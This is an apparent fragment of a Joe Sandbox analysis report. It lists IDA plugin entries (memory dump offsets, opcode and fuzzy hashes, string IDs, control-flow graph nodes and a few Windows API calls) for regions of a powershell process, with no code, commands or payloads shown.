                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k$^]k$^]k
                                  • API String ID: 0-3366670140
                                  • Opcode ID: 57ea4b91a00f36e384e02fba39c7a9e70c9fe6672424bd0991ee842367c0ec1a
                                  • Instruction ID: f6e2e95da515e7935061b4648ec4099dea48d685ee4f5000c67eec463c52a2aa
                                  • Opcode Fuzzy Hash: 57ea4b91a00f36e384e02fba39c7a9e70c9fe6672424bd0991ee842367c0ec1a
                                  • Instruction Fuzzy Hash: 80A1D4B47002009FDB28DB7984D967EB7A7AFC9301B148429E556DB394CF39ED02CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 522 7c64481-7c65334 733 7c6533c-7c66724 522->733
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad8a466a112897ffe2836513d978dd4ad9b97f10687eea3f149a2e1d80620c51
                                  • Instruction ID: 97a859507168774cdf626c442dfc7595ff6fd9316efdff27d995b04f136d4b6c
                                  • Opcode Fuzzy Hash: ad8a466a112897ffe2836513d978dd4ad9b97f10687eea3f149a2e1d80620c51
                                  • Instruction Fuzzy Hash: A2031774B41314DFEB29AB3498167AD77B2BB85701F2044BDA50AAF3D0DB76A981CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U
                                  • API String ID: 0-3372436214
                                  • Opcode ID: 9bde31627e642b791c65cf5a7c628780a6fa3cc284afe42954b84c9acd886cdb
                                  • Instruction ID: 3c5395235e1faa51fc979241dce20b08cbec52a308ef8891f0612b80ddf3dcf1
                                  • Opcode Fuzzy Hash: 9bde31627e642b791c65cf5a7c628780a6fa3cc284afe42954b84c9acd886cdb
                                  • Instruction Fuzzy Hash: 3A429D74A002059FCB25DF64C584BAE77E6EF88301F158469E90AEB395DB38ED41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c19ca7423082b69a6835b685a7ac831ca27f743cfc44540c89b3d7ddc28f356e
                                  • Instruction ID: 92972a1858c5febf9b69ada77ccd2c2d87e9248f547b1596e76767bdeae76e4d
                                  • Opcode Fuzzy Hash: c19ca7423082b69a6835b685a7ac831ca27f743cfc44540c89b3d7ddc28f356e
                                  • Instruction Fuzzy Hash: CC034C38A002188FDB65DB60D851BEEB777FB88345F1180A9E509AB798CF356D81CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf116021d24dd62d9d8f57807d276019f2c2e106e061bae3908df866d230e47c
                                  • Instruction ID: 1556530a976f1cb331e0335db18df2674b3894785b3ac0685aa778a42a6a8a29
                                  • Opcode Fuzzy Hash: bf116021d24dd62d9d8f57807d276019f2c2e106e061bae3908df866d230e47c
                                  • Instruction Fuzzy Hash: DBD1DF70B052499FCB18DFB5D8546AEBBB2EFC5300F154469EA06EB390DB34AD06CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4<]k$l8]k$l8]k
                                  • API String ID: 0-526888064
                                  • Opcode ID: 84a4bd4fdf883ff3793f5ba49dbb94b9b777983ee9c2a74d03e77231c3c3351d
                                  • Instruction ID: a8a6513cfc0d2e13e9177bd8ddec054d76d8695ac4ef7955ca6247199f795994
                                  • Opcode Fuzzy Hash: 84a4bd4fdf883ff3793f5ba49dbb94b9b777983ee9c2a74d03e77231c3c3351d
                                  • Instruction Fuzzy Hash: 43915974B006058FDB249BB8D494AEEB7F6AF88310F558429E902EB390DF35DD068F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LR}l$CLe^
                                  • API String ID: 0-3750338765
                                  • Opcode ID: dc3d4d8011b19ccd11f98b4f6e15e189d835d1d5b53f46fbf938709d6ce59c11
                                  • Instruction ID: 866a1fdc7c499f357ec4f939e957e48e0def198953fc06f848dc1e025c3b8c28
                                  • Opcode Fuzzy Hash: dc3d4d8011b19ccd11f98b4f6e15e189d835d1d5b53f46fbf938709d6ce59c11
                                  • Instruction Fuzzy Hash: E2A145B0B002058FCB18DF64D498A6DB7B2FF89315F148569E816EB3A0DB75EC42CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O5$O5
                                  • API String ID: 0-31741633
                                  • Opcode ID: 23b1de8c00e5bb107d1624137371f29ea6fd3eb54d4e8ba50fce4c97a3814497
                                  • Instruction ID: 48fe299dedd86bea8ddf65c1f4312b39756ab81fb536977bc3d7d4c13f31db09
                                  • Opcode Fuzzy Hash: 23b1de8c00e5bb107d1624137371f29ea6fd3eb54d4e8ba50fce4c97a3814497
                                  • Instruction Fuzzy Hash: 064169B57082598FCB15DF68C810AAE7BB2EFC5210F05806AE516CB252DB31DD51CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'}l$c}l
                                  • API String ID: 0-3983991366
                                  • Opcode ID: 76a271f0fb508e91716edf9e9796c9107066227efee8f089c74c2d988b199933
                                  • Instruction ID: c828599526ad8c0931c2cc7aa578097557ca4dd5c1104fbd90c2d2ea5c98783b
                                  • Opcode Fuzzy Hash: 76a271f0fb508e91716edf9e9796c9107066227efee8f089c74c2d988b199933
                                  • Instruction Fuzzy Hash: 3A41C2353041005FC704AB78E894A6E77E6EFCA355F1640B9E20ADF3A2DF65DC0587A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 509 7ae125d-7ae12a0 512 7ae12ba-7ae12bc 509->512 513 7ae12a2-7ae12a8 509->513 516 7ae12c4-7ae12ca 512->516 514 7ae12ac-7ae12b8 513->514 515 7ae12aa 513->515 514->512 515->512 517 7ae12ce-7ae12da 516->517 518 7ae12cc 516->518 520 7ae12dc-7ae12e0 517->520 518->520
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'}l$4'}l
                                  • API String ID: 0-1014041706
                                  • Opcode ID: 92ce8494d7a682df3c1dfb6893d1137234159351f6db056f86d23b520e2ab0a0
                                  • Instruction ID: e431dba59830bc08e91613400d5cd3c759aab322f5bcf559772e09dd14b1e125
                                  • Opcode Fuzzy Hash: 92ce8494d7a682df3c1dfb6893d1137234159351f6db056f86d23b520e2ab0a0
                                  • Instruction Fuzzy Hash: 6B01DB7670C2558FC366136878262E67BB78FC3161B1A40B7D161DFA52C9608C4683F2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  • Opcode ID: c264f058eaa09d17370464fb69b1a188a01b3994a34484b29f4b27beaa18070b
                                  • Instruction ID: d6ea292e2ec1279b9d0d209d2dbb4a9e341da690b05865c3aaca3bdf1d14449a
                                  • Opcode Fuzzy Hash: c264f058eaa09d17370464fb69b1a188a01b3994a34484b29f4b27beaa18070b
                                  • Instruction Fuzzy Hash: A4126B7429D7D38ED302873C888168EBFD15F57621F280394D1A89B3D7EB29951287EB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00C581B0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00C581B0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetThreadUILanguage.KERNELBASE ref: 082CC9A2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1766246868.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_82c0000_powershell.jbxd
                                  Similarity
                                  • API ID: LanguageThread
                                  • String ID:
                                  • API String ID: 243849632-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetThreadUILanguage.KERNELBASE ref: 082CC9A2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1766246868.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_82c0000_powershell.jbxd
                                  Similarity
                                  • API ID: LanguageThread
                                  • String ID:
                                  • API String ID: 243849632-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: s)
                                  • API String ID: 0-2727421637
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: s)
                                  • API String ID: 0-2727421637
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LR}l
                                  • API String ID: 0-1093396623
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1569be70c327b6097e693f96562e7e12a7e1080248d50bd3ae3dbddbbcbb187
                                  • Instruction ID: 594c519e8665d01cb6fad374d5f3547235a65bc2f7d949dcf832be4cc48c1d50
                                  • Opcode Fuzzy Hash: e1569be70c327b6097e693f96562e7e12a7e1080248d50bd3ae3dbddbbcbb187
                                  • Instruction Fuzzy Hash: 79616DB0A042048FCB15DBB8D4D86ADBBF2FF89310F05886AD805EB391DB75A945CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6929b29d6646d51c4ed0dcd0bf7d8213043ac8ee7c2567099f9bf0c0d20ab726
                                  • Instruction ID: 58140c1431508ccd9e4bea4fcb2ae90e9f28e6f3bdce6cde00790d1f15a409fe
                                  • Opcode Fuzzy Hash: 6929b29d6646d51c4ed0dcd0bf7d8213043ac8ee7c2567099f9bf0c0d20ab726
                                  • Instruction Fuzzy Hash: 5E616D74A10219DFCB04DFA8D9C89ADBBF2FF88314F158869E505AB361CB30AD45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0ee8c245953e2bfe0e2014a18ca776ddf442f195a94504f7f2c4019abba04de
                                  • Instruction ID: 534f902328129f18b775ae6ec0e13c9f19a420422b361232f54d43cc90f8ecaa
                                  • Opcode Fuzzy Hash: f0ee8c245953e2bfe0e2014a18ca776ddf442f195a94504f7f2c4019abba04de
                                  • Instruction Fuzzy Hash: 0D613D70A00259CFDB24DFA5D99469EB7B2FF88305F148428E406AB394DB75AD46CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a12e0a35326c5194cda1b6c9385de1bd929333740be41f48afcd9baa2e5f5bb0
                                  • Instruction ID: 7598596a3d78675e2356f5aea8be462c86d07aa38e3a2c7c2eab92576c89dc94
                                  • Opcode Fuzzy Hash: a12e0a35326c5194cda1b6c9385de1bd929333740be41f48afcd9baa2e5f5bb0
                                  • Instruction Fuzzy Hash: A5615E74A002598FDB24DFA4D99469EB7B2FF88305F148428E406AF794DB71ED46CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67b950f917e63a640ff82c8fb6d619454bea202a60e37c9d9c70b2d64ab9ff65
                                  • Instruction ID: 76c0f10fbcf37cc9a72a300d3c23bd71041ff670f2ac1542fce96da8380dbb14
                                  • Opcode Fuzzy Hash: 67b950f917e63a640ff82c8fb6d619454bea202a60e37c9d9c70b2d64ab9ff65
                                  • Instruction Fuzzy Hash: 2451BDB0E0465A9BDB14CFA4C8507EEBBF2EF84304F144429E845BB384DB74A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bc612916a621dd83f346e122f0086241485ac14c82a2d989c11621e8fc53f32
                                  • Instruction ID: fb88f372dd5553f034b7a94111f4ab9db76c1c6150daa678b2c083309075cf58
                                  • Opcode Fuzzy Hash: 2bc612916a621dd83f346e122f0086241485ac14c82a2d989c11621e8fc53f32
                                  • Instruction Fuzzy Hash: 4451B5F2E006098FCB25CF65C8406DDBBB1EF45314F298659E9057B290D7716E46CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6e591dba62f69f36749b07d4d457b9ce491d343db55872cee7f2b1cfed21c5f
                                  • Instruction ID: 7e1863aef8bdbf52451d9d5af29355bfc361e1fdff7caff350d7cbcb7b31ba6c
                                  • Opcode Fuzzy Hash: d6e591dba62f69f36749b07d4d457b9ce491d343db55872cee7f2b1cfed21c5f
                                  • Instruction Fuzzy Hash: 27514474A00245DFDB14DF68C484AAEBBF2EF88315F158469E916AB3A1CB31ED45CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21ccac97715b96386cf0ba73b985d1af81731c3e4375f26be4ecf7145418dbeb
                                  • Instruction ID: aaa77da900e39c035fbe903aa430763ea51b6677936fc77a95bc42318f1bb0cd
                                  • Opcode Fuzzy Hash: 21ccac97715b96386cf0ba73b985d1af81731c3e4375f26be4ecf7145418dbeb
                                  • Instruction Fuzzy Hash: 295129B0A002469FDB14DF64D494BAEBBF2FF88305F144569E806AB7A1DB74E885CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bf6be3543e765dd306334be53000f1bf13176acdace763ffff7425943c454db
                                  • Instruction ID: b6fa3062f9c79496dd410be0b7c1a2454c3651539d38ddb2ba9fc2cce8f5f34f
                                  • Opcode Fuzzy Hash: 1bf6be3543e765dd306334be53000f1bf13176acdace763ffff7425943c454db
                                  • Instruction Fuzzy Hash: 89513AB0A002069FDB14DF64D494BAEBBB6BF88305F144469E806AB7A1DB74E885CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b792a1fdff33c81945c25d87f2a1e015ba00254e40207fd8dba0cfc07e93f6fa
                                  • Instruction ID: 8021c5afb1a6b0cbd605e6b77a14805c2e0100260e74c1d2c5d18d1a1c65a509
                                  • Opcode Fuzzy Hash: b792a1fdff33c81945c25d87f2a1e015ba00254e40207fd8dba0cfc07e93f6fa
                                  • Instruction Fuzzy Hash: 45517C70A04649DFCB14DF64D890AEEB7B6FF89305F148829E406AB264DB71A941CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c20e17b1f3f4d79c2f6b03036c3009f5390c1fd607f53e91ca35b68a5acde504
                                  • Instruction ID: f2556e1e032cff22677bd0f5956a8300072f224252ee347fa7d79644c77c6ff4
                                  • Opcode Fuzzy Hash: c20e17b1f3f4d79c2f6b03036c3009f5390c1fd607f53e91ca35b68a5acde504
                                  • Instruction Fuzzy Hash: 0651CF742007029FC324AB79C89176EB7A2FBC1324F108A2DD1669F7D5CF75E8428B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ab48de265e8ed6cf14b4286315e4e1b2573f2350c169b65a9b93c06cd95f4c8
                                  • Instruction ID: ad3cef2b6a84c66bdad3743524f58b7b5c1f87119ef9e3191b1c4fda4e470952
                                  • Opcode Fuzzy Hash: 9ab48de265e8ed6cf14b4286315e4e1b2573f2350c169b65a9b93c06cd95f4c8
                                  • Instruction Fuzzy Hash: 42515274A002148FCB58DFB9C8846ADBBF2FF88311F148469E916EB351DB75E9018B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a8e3f521ab36e3016bc928248ad15482739b0116c9e6fb39ff94a9793043fb3
                                  • Instruction ID: dfb6c563b0a99490bf5b4f28ab9816b2e7797fe587002a6bf9502b77aa20a130
                                  • Opcode Fuzzy Hash: 4a8e3f521ab36e3016bc928248ad15482739b0116c9e6fb39ff94a9793043fb3
                                  • Instruction Fuzzy Hash: 5B417F742047029FD324AB75C891B2EB796FBC1324F108A2CD1669F7D4DF75E8428B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 917b0007cf8f538f0a8c6058e8ba006408cca9cd3041ee8a1b148c605e81f6a9
                                  • Instruction ID: c1c123f9d20ed105e7cd5bcdb7941ffaf612d7d7a62bb70f1f69239929ddb939
                                  • Opcode Fuzzy Hash: 917b0007cf8f538f0a8c6058e8ba006408cca9cd3041ee8a1b148c605e81f6a9
                                  • Instruction Fuzzy Hash: 7541D8B0B042459BDB55DBB9C8847EF7BEAEBC9300F104139A709D7384EF74AA058791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 30cb3f9bc8e6e65b96b5cb83947007c3093c2137c1e20a46a5b9ca2600549f4e
                                  • Instruction ID: 509daff0ed783cea5244e498e6ed5aafd986752d90f345304deb8915f0c50c3a
                                  • Opcode Fuzzy Hash: 30cb3f9bc8e6e65b96b5cb83947007c3093c2137c1e20a46a5b9ca2600549f4e
                                  • Instruction Fuzzy Hash: 5B416CB0E042098FCB24DF68D4C8AEDBBF2EF88314F148469D815AB390DB74E945CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b034f677d257dfbb28146647cb687fc70e0f7d2aec9029272b22c58e06a16a16
                                  • Instruction ID: 772d7806d8e24dbf7a32ba16de4e4d03063b2082e77bec495267f101e40d17db
                                  • Opcode Fuzzy Hash: b034f677d257dfbb28146647cb687fc70e0f7d2aec9029272b22c58e06a16a16
                                  • Instruction Fuzzy Hash: F9513BB0A042099FCB24DF64D895BADBBB6FB84300F108429E54AAB395DF35AD85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 474385484532b42cfa23da195fd16d5b8fff6f6c6e059a646f0e8e2bfbef9545
                                  • Instruction ID: 1d2e129f25b87102fbbbbbc90d1a27f7c5741a491530fa8acc4a7d3ee988e17f
                                  • Opcode Fuzzy Hash: 474385484532b42cfa23da195fd16d5b8fff6f6c6e059a646f0e8e2bfbef9545
                                  • Instruction Fuzzy Hash: 26417EB47001019FCB08DF68D494A6E7BAAEF89355F148069E906DB395CF35DD05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
